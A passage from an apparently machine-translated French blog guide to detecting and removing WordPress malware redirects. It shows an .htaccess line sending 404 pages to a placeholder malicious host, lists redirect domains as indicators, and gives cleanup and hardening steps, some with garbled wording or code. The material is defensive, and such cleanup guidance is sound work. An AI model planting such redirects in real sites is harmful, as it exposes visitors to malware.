Il existe également un moyen de rediriger toutes les pages d’erreur (comme 404, 503, etc.) vers des sites malveillants en utilisant l’extrait de fichier .htaccess suivant

RewriteEngine On
ErrorDocument 404 http://malicioussite.com/malware.php

Ce code .htaccess supplémentaire redirigera le visiteur vers un site malveillant au lieu d’un modèle de 404 pages.

  1. Recherchez les redirections malveillantes dans vos fichiers, thèmes et plugins WordPress

Le fait de voir un code similaire aux exemples présentés ci-dessus confirme que votre site a été piraté. La suppression de ces lignes empêchera vos visiteurs d’être redirigés, mais malheureusement, cela ne signifie pas que le piratage de redirection des logiciels malveillants a été entièrement supprimé. Il y a probablement des fichiers malveillants détournés que le pirate informatique a utilisés pour accéder à votre site. Si ces portes dérobées restent sur le site, votre .htaccess et votre site WordPress seront éventuellement modifiés et infectés à nouveau.

Si vous n’êtes pas sûr que le code de votre .htaccess soit un logiciel malveillant ou non, ou si vous ne vous sentez pas à l’aise pour le modifier, il peut être judicieux de créer une sauvegarde et de la remplacer par le htaccess WordPress par défaut.

  1. Vérifiez que votre thème header.php et footer.php ne contient pas d’injections de code malveillant

Header.php et footer.php sont des fichiers de modèles de base. Tous les thèmes WordPress en ont. Ils peuvent avoir des fichiers supplémentaires qui sont appelés à partir de header.php et footer.php mais ces deux fichiers seront toujours là. Une exception est si votre thème utilise un thème enfant qui ne nécessite rien d’autre qu’un fichier style.css pour fonctionner mais dans ce cas, header.php et footer.php sont déjà chargés à partir du thème parent. Conclusion – ils seront chargés d’une manière ou d’une autre.

Les pirates informatiques le savent, c’est pourquoi ils mettent souvent un code malveillant dans ces deux fichiers ou dans les fichiers qui y sont inclus. Ce code n’est pas si difficile à repérer une fois que vous savez ce qu’il faut chercher. Voici quelques caractéristiques du code :

  • Il sera souvent obscurci
  • Il aura les fonctions “base64()” et “eval()”.

Consultez l’exemple suivant :

Le code ci-dessus est un exemple de ce que vous pourriez trouver dans votre fichier header.php. Voici à quoi cela ressemble lorsqu’il est décodé avec la fonction base64_decode() :

L’exemple de code est destiné à rediriger les visiteurs en fonction de certains paramètres vers un domaine appelé default7 .com et, plus bas, il comporte une chaîne de redirection basée sur certaines conditions qui s’appliquent individuellement aux visiteurs du site piraté. Les pirates de redirection de logiciels malveillants sont connus pour utiliser des chaînes de redirection qui redirigent les visiteurs de sites infectés vers les domaines suivants :

  • default7 .com
  • test246.com
  • test0 .com
  • distinctfestive .com
  • ableoccassion.com

Si vous en voyez la moindre mention dans votre dossier, c’est la confirmation à 100% que vous avez été piraté.

Comment nettoyer le hack de redirection des logiciels malveillants de WordPress
Si vous avez trouvé des injections de code similaires dans les fichiers de votre site WordPress, il y a trois choses que vous pouvez faire pour récupérer votre site WordPress piraté. Avant de poursuivre la lecture, nous devons vous avertir qu’il faut d’abord créer une sauvegarde des fichiers et de la base de données de votre site WordPress et la compresser dans un fichier zip. Enfin et surtout, stockez le fichier localement pour pouvoir y accéder facilement si vous décidez de le restaurer.

  1. Remplacez votre thème WordPress actif par une copie fraîchement téléchargée
    Supprimez vos fichiers de thème WordPress actuels et remplacez-les par ceux que vous venez de télécharger. N’oubliez pas que si vous avez codé en dur des modifications dans vos fichiers de thème, vous devrez les appliquer à nouveau.
  2. Remplacer les fichiers WordPress de base infectés par les fichiers originaux
    La prochaine étape consiste à supprimer vos anciens fichiers de base WordPress et à les remplacer par ceux que vous venez de télécharger sur WordPress.org. Dans ce cas, vous devez vous assurer que vous appliquez également les mises à jour en cours. Une nouvelle installation de WordPress compte actuellement 1835 fichiers. Ajoutez des plugins, des thèmes et ce nombre augmente rapidement. Vous ne pouvez pas vérifier tous les dossiers. C’est pourquoi il est important de parcourir les dossiers dans un certain ordre.

Le premier fichier qui se charge lorsque quelqu’un visite votre site est “index.php”. Il est assez facile de dire si le dossier a été falsifié. Il devrait avoir une taille de 418 à 420 octets et ne devrait charger qu’un seul fichier en utilisant la fonction “require()” :
require( dirname( FILE ) . /wp-blog-header.php’ ) ;

Si vous voyez un autre fichier chargé avec la fonction “require()”, il s’agit très probablement d’un malware.

Il en va de même pour “wp-config.php”, qui ne doit comporter qu’une seule ligne où la fonction “require()” a été utilisée (tout en bas) :

require_once( ABSPATH . ‘wp-settings.php’ ) ;

Cependant, certains hébergeurs chargent certains fichiers ou plugins requis via le fichier wp-config.php, ce qui peut ajouter une certaine confusion. Mais voici la différence : un fournisseur d’hébergement ne mettra jamais le fichier dans le répertoire wp-admin et wp-includes, mais plutôt dans wp-content/plugins. Si une fonction “require()” a été appelée pour récupérer un fichier autre que wp-settings.php dans ces répertoires, il s’agit très probablement d’un malware.

  1. Remplacer tous vos plugins WordPress
    C’est la meilleure solution lorsqu’il s’agit de préserver la fonctionnalité et la présentation du site. C’est également la pire solution si vous avez laissé des parties du code du logiciel malveillant. Cela peut entraîner des erreurs, une réinfection, un effondrement du site, etc. Si votre thème a été personnalisé, demandez à votre développeur de supprimer les logiciels malveillants pour vous, ou s’ils ne sont pas disponibles, engagez un professionnel pour le faire à votre place.
  2. Supprimer les sauvegardes de vos fichiers WordPress
    Si vous conservez des sauvegardes de vos installations WordPress, il y a de fortes chances pour qu’elles contiennent également des logiciels malveillants et que vous ne puissiez donc pas les utiliser pour restaurer entièrement votre site WordPress. Si ces sauvegardes sont stockées sous forme de fichiers bruts, les logiciels malveillants peuvent réinfecter votre site à maintes reprises.
  3. Nettoyez vos fichiers de cache WordPress
    La mise en cache de votre site WordPress est un moyen de stocker vos fichiers statiques, ce qui accélère leur chargement. Cela signifie également que les fichiers de logiciels malveillants sont également mis en cache et prêts à être manipulés par les pirates. Nous vous suggérons de supprimer tout le cache de votre site et de le désactiver complètement jusqu’à ce que vous soyez sûr de l’avoir nettoyé.
  4. Modifier vos données de connexion à l’administration de WordPress
    Un site WordPress piraté signifie que tout le contenu de votre site, y compris les identifiants des utilisateurs de l’administration, a été piraté ou manipulé. Cela dit, vous devez changer tous vos noms d’utilisateur et mots de passe administratifs avec de nouveaux. Veillez à réinitialiser également vos clés de sel wp-config.php afin que tous les utilisateurs connectés soient déconnectés de force.
  5. Ne pas utiliser plus de 2 comptes admin
    Nous suggérons fortement de ne laisser qu’un ou deux comptes d’administrateur et de déclasser tous les autres pour des rôles d’utilisateurs inférieurs tels qu’auteurs et éditeurs. Moins d’administrateurs signifie moins de possibilités d’avoir un de ces comptes piraté et d’infecter votre site WordPress avec des logiciels malveillants.

Si vous avez besoin de plus d’un ou deux administrateurs actifs, vous pouvez utiliser notre propre plugin d’administration des utilisateurs WP afin de programmer des changements de rôle ou des mises à niveau. De cette façon, vous pouvez définir un utilisateur comme administrateur pour une durée déterminée et le rétrograder automatiquement au rang d’auteur ou à tout autre rôle d’utilisateur privilégié.

  1. Supprimer les thèmes et plugins inactifs
    L’un des points d’entrée les plus courants pour les pirates est l’inactivité et l’abandon des plugins et des thèmes. Si vous n’utilisez pas un plugin ou un thème, il est préférable de le compléter, de le supprimer de votre site WordPress, sinon vous risquez de vous faire pirater encore et encore à cause de vulnérabilités trouvées dans des thèmes qui ne sont plus développés.
  2. Modifier vos données de connexion à la base de données
    Les sites WordPress piratés sont également la conséquence de l’utilisation de données de connexion simples et amusantes pour leur base de données MySQL. Assurez-vous de créer un nom d’utilisateur et un mot de passe uniques pour chaque base de données WordPress que vous créez sous votre compte d’hébergement.
  3. Vérifiez votre fichier wp-config.php pour les injections de script
    L’un des premiers fichiers qu’un pirate informatique utilise pour injecter des logiciels malveillants est wp-config.php. Ceci est le principal

Il s’agit du fichier principal de WordPress. Son exploitation permet donc au pirate de diffuser plus facilement des logiciels malveillants dans tous les fichiers de votre site WordPress. Il peut également être utilisé pour infecter d’autres sites WordPress hébergés sous le même compte d’hébergement.

Le moyen le plus sûr de nettoyer ce fichier est de noter les détails de connexion à la base de données WordPress (nom de la base de données, nom d’utilisateur, mot de passe et préfixe de table, de supprimer le fichier wp-config.php en direct et d’utiliser le fichier wp-config.php par défaut (qui se trouve sous le nom de wp-config-sample.php) et d’insérer les détails de la base de données en direct.

  1. Modifier les clés d’authentification de votre fichier wp-configh.php
    Une fois que vous avez restauré le fichier wp-config.php par défaut, remplacez les clés d’authentification en en générant de nouvelles.
  2. Mettez à jour votre installation WordPress
    Les logiciels malveillants se répandent généralement dans les fichiers de base de votre site WordPress, aussi, pour faire suite à l’étape 2, nous vous suggérons de mettre également à jour votre WordPress. Il existe une option pour cet emploi dans votre page de mise à jour du tableau de bord WordPress.
  3. Vérifiez la présence de logiciels malveillants dans votre répertoire de médias
    Parcourez votre répertoire wp-content/uploads à l’aide d’un client FTP ou du gestionnaire de fichiers de votre panneau d’hébergement et recherchez les fichiers .php, .js et .ico dans vos répertoires média. Vos répertoires de médias ne doivent contenir que des fichiers statiques comme des images et des pdf.
  4. Suivez la même procédure pour tous les autres sites WordPress
    Si vous hébergez d’autres sites WordPress sous le même compte d’hébergement, ils peuvent également être infectés. Dans ce cas, vous devez les nettoyer toutes sans poser de questions, sinon le reste du site WordPress ré-infectera les sites récemment nettoyés.

Il est tout aussi important de nettoyer votre site WordPress de la redirection des logiciels malveillants que de trouver les raisons pour lesquelles votre site a été infecté au départ. De cette façon, vous éviterez que le piratage ne se reproduise. Lorsque vous apprenez comment votre site a été piraté, vous avez une longueur d’avance sur le pirate. Vous pouvez localiser les fichiers contenant des codes malveillants et supprimer toute porte dérobée ayant accordé au pirate des privilèges d’administrateur. Il vous aidera également à acquérir une certaine expérience en matière de nettoyage de sites WordPress piratés, ce qui vous permettra de mieux sécuriser de manière proactive vos autres sites WordPress

  1. Logiciels obsolètes
    Les logiciels obsolètes (noyau, thèmes et plugins WordPress) sont la principale cause de vulnérabilité. Les pirates connaissent généralement les faiblesses dès le départ car les vulnérabilités de sécurité sont parfois notées dans les journaux des modifications.
  2. Vulnérabilités des plugins
    Parfois, même les dernières mises à jour peuvent contenir des bogues – prenez 5 minutes pour lire un problème qui s’est produit avec un exploit 0-Day dans l’une des versions du plugin Easy WP SMTP.
  3. Des références prévisibles
    L’utilisation d’identifiants prévisibles (je vous regarde, utilisateur “admin” !) facilite grandement le succès des attaques par force brute. Si quelqu’un obtient l’accès à l’administration soit en détournant votre utilisateur actuel ou en créant un administrateur fantôme par le biais d’une vulnérabilité, vous avez officiellement perdu le contrôle de votre site.
  4. Utilisation des thèmes et plugins annulés
    Permettez-moi de dire que je comprends parfaitement la tentation. Vous pensez peut-être que vous pouvez économiser 50 à 60 dollars sur ce thème, sans parler de ces extensions WooCommerce très coûteuses qui peuvent atteindre 249 dollars. Chaque année. Vous pensez peut-être aussi que vous pouvez réorienter cet argent et l’utiliser pour le marketing. N’est-ce pas ? Faux.

Rien dans ce monde n’est gratuit. Les thèmes nuls ne sont pas une exception. Ils seront livrés avec des logiciels publicitaires, des logiciels contre rançon ou tout autre type de logiciel. Lorsque cela commencera à ramper sur votre site, l’argent que vous aurez économisé sera de la petite monnaie par rapport à ce que vous allez dépenser pour nettoyer votre site et réparer les dégâts (qui peuvent être totaux).

Comment protéger votre site WordPress contre un nouveau piratage


Avant de faire des suggestions, je vais être tout à fait honnête. Quoi que vous fassiez et quel que soit votre dévouement pour sécuriser votre site, il y a toujours une possibilité que quelqu’un réussisse à le pirater. Si cela vous donne envie de nous crier dessus dans la section des commentaires, je comprends tout à fait, mais permettez-moi de m’étendre.

Votre travail consiste à ne pas faciliter le piratage de votre site par quiconque. La possibilité sera toujours là, mais la rapidité avec laquelle vous la saisissez et la rapidité de votre réaction peuvent faire une grande différence. Si vous disposez d’une sécurité adéquate, il y a de fortes chances que votre site ne subisse aucun dommage grave et que vous puissiez tout ramener à la normale en un rien de temps.

Dans cet esprit, voici la liste des choses que vous souhaitez faire pour assurer la sécurité de votre site :

  • Protéger la page de connexion
  • Sécurisez vos dossiers et votre base de données
  • Mettez à jour vos thèmes, plugins et fichiers de base WordPress
  • Appliquer des restrictions pour les bots, certains PA et pays
  • Surveillez votre site

Vous trouverez ici un article de fond sur la manière de protéger votre site WordPress contre le piratage.

Il est également conseillé de s’abonner à un service de sécurité WordPress. Cela vous permettra de surveiller constamment le site et de réagir rapidement en cas de problème. Il s’ajoute aux dépenses mensuelles et peut ne pas convenir à tous les budgets, mais cela dépend surtout de ce que votre site représente pour vous et de ce que vous êtes prêt à dépenser pour le sécuriser.